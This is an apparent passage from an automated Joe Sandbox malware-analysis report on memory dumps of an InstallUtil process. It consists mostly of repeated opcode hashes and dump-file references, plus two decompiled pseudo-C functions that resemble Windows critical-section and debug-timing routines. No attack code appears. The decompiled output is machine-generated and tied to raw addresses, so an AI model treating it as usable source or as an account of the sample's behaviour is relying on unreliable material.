                      • Opcode ID: 1f1747afce598d4b12a17829c05f050401cfb383a81ec542b9261728ecba1340
                      • Instruction ID: 0f1d43bf42128bd450ba022355354ed7b162f904d1bf09fe1165fa0251d386e7
                      • Opcode Fuzzy Hash: 1f1747afce598d4b12a17829c05f050401cfb383a81ec542b9261728ecba1340
                      • Instruction Fuzzy Hash: 5C90027520141402D5046199480C7470405A7D1346F51C421A5154555EC6A5C8A57571
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 771361274485398706d8b36495c4ea77f43f3424f250f326b715e9a7102d2018
                      • Instruction ID: f1f06c079a0b3bcb653bd5d0c3e8bed54e525df85bbaf85b178badf8f10f9e36
                      • Opcode Fuzzy Hash: 771361274485398706d8b36495c4ea77f43f3424f250f326b715e9a7102d2018
                      • Instruction Fuzzy Hash: CF90026520145442D54462994808B0F4505A7E2346F91C429A4146554CC95588696761
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 76ed6859ba467e031def712ba9a40d312bf121e709d6373f788d62fb12c40c98
                      • Instruction ID: 38871af5a5ff3edeedec447352c0f7be3015841bac2a5d2d2ed9a0947d7ead86
                      • Opcode Fuzzy Hash: 76ed6859ba467e031def712ba9a40d312bf121e709d6373f788d62fb12c40c98
                      • Instruction Fuzzy Hash: 19900275A0501012D544719948186464406B7E1785B55C421A0504554CC9948A6963E1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 041a74bb9725fa68463bd974c8f8075486d1daca04967e775bd98a6870f3fb88
                      • Instruction ID: d2a7da4f0e25f8e6247e693ae4976febcc64162cd08a62f81b13d1ffc12ac4a6
                      • Opcode Fuzzy Hash: 041a74bb9725fa68463bd974c8f8075486d1daca04967e775bd98a6870f3fb88
                      • Instruction Fuzzy Hash: C99002E5201150928904A2998408B0A4905A7E1345B51C426E1044560CC5658865A175
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7848ab64cccbdf27e23f3ea87921e1f5fb345b9843ac0c1fc1a82ac6269c5b3b
                      • Instruction ID: da6ed29b4223349bff35b767ef14884f9474656191183c570d687b691d89413e
                      • Opcode Fuzzy Hash: 7848ab64cccbdf27e23f3ea87921e1f5fb345b9843ac0c1fc1a82ac6269c5b3b
                      • Instruction Fuzzy Hash: 8F900269221010024549A599060850B0845B7D7395391C425F1406590CC66188796361
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0aef16063e3311bed51db346036eb64993a8046c58dc727dd3f97606c7847f48
                      • Instruction ID: 146127ba377e78c1f843af9ea0294e58e951a8916b72f80e73eae57fa0e9e84c
                      • Opcode Fuzzy Hash: 0aef16063e3311bed51db346036eb64993a8046c58dc727dd3f97606c7847f48
                      • Instruction Fuzzy Hash: C190027520101802D508619948086860405A7D1345F51C421A6014655ED6A588A57171
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6aa93beb461dcc36b4a6734e3383bd8ad22db6950b5a8306b48c92f3c90151d8
                      • Instruction ID: 6f7cb8363dfbc835e7de91e329fe6d0b63c4bb255b581851ea8097c01fad49af
                      • Opcode Fuzzy Hash: 6aa93beb461dcc36b4a6734e3383bd8ad22db6950b5a8306b48c92f3c90151d8
                      • Instruction Fuzzy Hash: A490026560501402D5447199541C7060415A7D1345F51D421A0014554DC6998A6976E1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fdb357f9efc631dd084d09c5fb39ef156e59b912fcd061660394725fd96e1849
                      • Instruction ID: 827719fb7ab7b37785cfe0217a096f39e3fbd1101dd3c4904e9af1720ab9832d
                      • Opcode Fuzzy Hash: fdb357f9efc631dd084d09c5fb39ef156e59b912fcd061660394725fd96e1849
                      • Instruction Fuzzy Hash: 1790027530101052D904A6D95808A4A4505A7F1345B51D425A4004554CC59488756161
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7eddc2db431eec1d7a53e63c336010d96382ca14a437e010e583ade461f0c284
                      • Instruction ID: 6f04dbd8d1be34cdaf45c122b8aa65b5e90f56b2459fb91ce69a8737658810e5
                      • Opcode Fuzzy Hash: 7eddc2db431eec1d7a53e63c336010d96382ca14a437e010e583ade461f0c284
                      • Instruction Fuzzy Hash: BF90027920505442D90465995808A870405A7D1349F51D821A041459CDC6948875B161
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a06f21a788ac7c6b28dc3ba99c0fe883f804ab7b777afd12d33980c6f1cd823b
                      • Instruction ID: 67adb8f486773aae831ebbeb60f3c84e7cc41c6a9eada2695a2096a02155d099
                      • Opcode Fuzzy Hash: a06f21a788ac7c6b28dc3ba99c0fe883f804ab7b777afd12d33980c6f1cd823b
                      • Instruction Fuzzy Hash: 7590026520505442D5046599540CA060405A7D1349F51D421A1054595DC6758865B171
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 22a7b3e9d66a96f08fd1985963110b46d63407f561c5499d771308552b31a5d2
                      • Instruction ID: ede2742b648f95dd26fadc47fe9014ff810222e6447faedf6a200a611d8c5a42
                      • Opcode Fuzzy Hash: 22a7b3e9d66a96f08fd1985963110b46d63407f561c5499d771308552b31a5d2
                      • Instruction Fuzzy Hash: F290027520101403D5046199550C7070405A7D1345F51D821A0414558DD69688657161
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bdef3ba1d55ff5cb334661d08aa6d76b7cda4a9176af07e4136585b1f41044c6
                      • Instruction ID: 76b3d1ec92602afa6cc31e2d3024451f7bb3871937814d0e2c1cfb9865b68fc5
                      • Opcode Fuzzy Hash: bdef3ba1d55ff5cb334661d08aa6d76b7cda4a9176af07e4136585b1f41044c6
                      • Instruction Fuzzy Hash: 5690027531115402D514619984087060405A7D2345F51C821A0814558DC6D588A57162
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ba63956297cc33e8fb050e3a5bf778a8bf57a256403407f96a1ef3b390f8ae73
                      • Instruction ID: 5d3c4b87ee0630ea9bcee067b21fab7248fe4495c1f18760ff988f1af96cb04a
                      • Opcode Fuzzy Hash: ba63956297cc33e8fb050e3a5bf778a8bf57a256403407f96a1ef3b390f8ae73
                      • Instruction Fuzzy Hash: 3E90027560501802D554719944187460405A7D1345F51C421A0014654DC7958A6976E1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a43554a7e5f1679e84eb1e98aee6a367235a097019403033412e100d9e33f996
                      • Instruction ID: 32e9587b7d161dc1c813073c8676a08cd8eef4222e4a03811026c536119a7af5
                      • Opcode Fuzzy Hash: a43554a7e5f1679e84eb1e98aee6a367235a097019403033412e100d9e33f996
                      • Instruction Fuzzy Hash: E190027520505842D54471994408A460415A7D1349F51C421A0054694DD6658D69B6A1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1bd1a59a4be5bbeca61b1472b4d0f0f8c652fff35494a9ef430d7d1a11df459c
                      • Instruction ID: 3a8e3832a441e5dbedf0deabf6be17cc86013848f09f7ea4caaab01f13e0685c
                      • Opcode Fuzzy Hash: 1bd1a59a4be5bbeca61b1472b4d0f0f8c652fff35494a9ef430d7d1a11df459c
                      • Instruction Fuzzy Hash: AE90027520101842D50461994408B460405A7E1345F51C426A0114654DC655C8657561
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                      • Instruction ID: 04ecf686a11e89cb9957f9afea7c912be5bf82e231fb4e0740bcdab2a700d994
                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                      • Instruction Fuzzy Hash:
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 26%
                      			E012F645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
                      				signed int _v8;
                      				void* _v36;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				intOrPtr _v56;
                      				char _v60;
                      				char _v64;
                      				intOrPtr _v68;
                      				intOrPtr _v72;
                      				intOrPtr _v76;
                      				intOrPtr _v80;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr _t48;
                      				intOrPtr _t49;
                      				intOrPtr _t50;
                      				intOrPtr* _t52;
                      				char _t56;
                      				void* _t69;
                      				char _t72;
                      				void* _t73;
                      				intOrPtr _t75;
                      				intOrPtr _t79;
                      				void* _t82;
                      				void* _t84;
                      				intOrPtr _t86;
                      				void* _t88;
                      				signed int _t90;
                      				signed int _t92;
                      				signed int _t93;
                      
                      				_t80 = __edx;
                      				_t92 = (_t90 & 0xfffffff8) - 0x4c;
                      				_v8 =  *0x13bd360 ^ _t92;
                      				_t72 = 0;
                      				_v72 = __edx;
                      				_t82 = __ecx;
                      				_t86 =  *((intOrPtr*)(__edx + 0xc8));
                      				_v68 = _t86;
                      				E0130FA60( &_v60, 0, 0x30);
                      				_t48 =  *((intOrPtr*)(_t82 + 0x70));
                      				_t93 = _t92 + 0xc;
                      				_v76 = _t48;
                      				_t49 = _t48;
                      				if(_t49 == 0) {
                      					_push(5);
                      					 *((char*)(_t82 + 0x6a)) = 0;
                      					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
                      					goto L3;
                      				} else {
                      					_t69 = _t49 - 1;
                      					if(_t69 != 0) {
                      						if(_t69 == 1) {
                      							_push(0xa);
                      							goto L3;
                      						} else {
                      							_t56 = 0;
                      						}
                      					} else {
                      						_push(4);
                      						L3:
                      						_pop(_t50);
                      						_v80 = _t50;
                      						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
                      							E012E2280(_t50, _t86 + 0x1c);
                      							_t79 = _v72;
                      							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                      							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
                      							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
                      							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
                      							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
                      							E012DFFB0(_t72, _t82, _t86 + 0x1c);
                      						}
                      						_t75 = _v80;
                      						_t52 =  *((intOrPtr*)(_v72 + 0x20));
                      						_t80 =  *_t52;
                      						_v72 =  *((intOrPtr*)(_t52 + 4));
                      						_v52 =  *((intOrPtr*)(_t82 + 0x68));
                      						_v60 = 0x30;
                      						_v56 = _t75;
                      						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
                      						asm("movsd");
                      						_v76 = _t80;
                      						_v64 = 0x30;
                      						asm("movsd");
                      						asm("movsd");
                      						asm("movsd");
                      						if(_t80 != 0) {
                      							 *0x13bb1e0(_t75, _v72,  &_v64,  &_v60);
                      							_t72 = _v76();
                      						}
                      						_t56 = _t72;
                      					}
                      				}
                      				_pop(_t84);
                      				_pop(_t88);
                      				_pop(_t73);
                      				return E0130B640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
                      			}



































                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: DebugPrintTimes
                      • String ID: 0$0
                      • API String ID: 3446177414-203156872
                      • Opcode ID: fb8f5329f22498befda62e56318542005d6c51c205e352f4eec08bd6c5596742
                      • Instruction ID: 5c0e1c72966af88fb9682753efe8bfd4035709c462f06ca558ea1aebc8eb3f79
                      • Opcode Fuzzy Hash: fb8f5329f22498befda62e56318542005d6c51c205e352f4eec08bd6c5596742
                      • Instruction Fuzzy Hash: 85417CB16187069FC311CF28C584A1ABBE5FB88718F04466EF688DB341D771EA05CB96
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 53%
                      			E0135FDDA(intOrPtr* __edx, intOrPtr _a4) {
                      				void* _t7;
                      				intOrPtr _t9;
                      				intOrPtr _t10;
                      				intOrPtr* _t12;
                      				intOrPtr* _t13;
                      				intOrPtr _t14;
                      				intOrPtr* _t15;
                      
                      				_t13 = __edx;
                      				_push(_a4);
                      				_t14 =  *[fs:0x18];
                      				_t15 = _t12;
                      				_t7 = E0130CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                      				_push(_t13);
                      				E01355720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                      				_t9 =  *_t15;
                      				if(_t9 == 0xffffffff) {
                      					_t10 = 0;
                      				} else {
                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                      				}
                      				_push(_t10);
                      				_push(_t15);
                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                      				return E01355720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                      			}











                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0135FDFA
                      Strings
                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0135FE01
                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0135FE2B
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                      • API String ID: 885266447-3903918235
                      • Opcode ID: ed9f3c480f6fb73e1577791c59af5fcc4fe7405d7689e77a623c60d9357cb04e
                      • Instruction ID: 68ffe4a54bcb3d0377e39107f23522caa546c49ee3498720b2b8fde0bd33a360
                      • Opcode Fuzzy Hash: ed9f3c480f6fb73e1577791c59af5fcc4fe7405d7689e77a623c60d9357cb04e
                      • Instruction Fuzzy Hash: 82F0F632200201BFE7611A49DC02F63BF5EEB44B74F240314FA28565D1EA62F86097F0
                      Uniqueness

                      Uniqueness Score: -1.00%